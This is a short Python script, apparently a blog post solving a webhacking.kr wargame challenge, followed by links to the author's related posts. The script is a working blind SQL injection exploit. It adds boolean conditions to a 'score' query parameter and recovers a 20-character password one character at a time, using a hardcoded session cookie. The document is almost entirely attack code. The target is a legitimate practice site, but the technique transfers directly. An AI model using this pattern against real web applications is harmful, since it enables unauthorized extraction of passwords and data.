import http.client
import urllib

pwlen=20

def injection(q):
        c=http.client.HTTPConnection('webhacking.kr')
        head={'Host':'webhacking.kr'}
        head['Upgrade-Insecure-Requests']='1'
        head['Cookie']='id=rbc; PHPSESSID=98d235f45fb18e9188e6c7d13a5751cc'
        c.request('GET','/challenge/web/web-31/rank.php?score=0%20and%20'+urllib.parse.quote(q),headers=head)
        #print(c.getresponse().read().decode())
        return 'localhost' in c.getresponse().read().decode()

p='1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ?!@#$%^&*()~`[]\\'
ans=''
for i in range(pwlen):
        for j in p:
                print(j)
                if(injection('right(left(pAsSw0RdzzzZ,'+str(i+1)+'),1)='+hex(ord(j)))):
                        ans+=j
                        print(ans)
                        break

print(ans)

'war game > webhacking.kr' 카테고리의 다른 글

[webhacking.kr]2번-blindsql  (0) 2017.02.19
[webhacking.kr] 41번  (0) 2017.02.01
[webhacking.kr]22번 blind sql injection binary search  (0) 2017.01.30
[webhacking.kr 21]blind sql injection  (0) 2017.01.30
[webhacking.kr] 6번 100pt  (0) 2017.01.18

+ Recent posts

티스토리툴바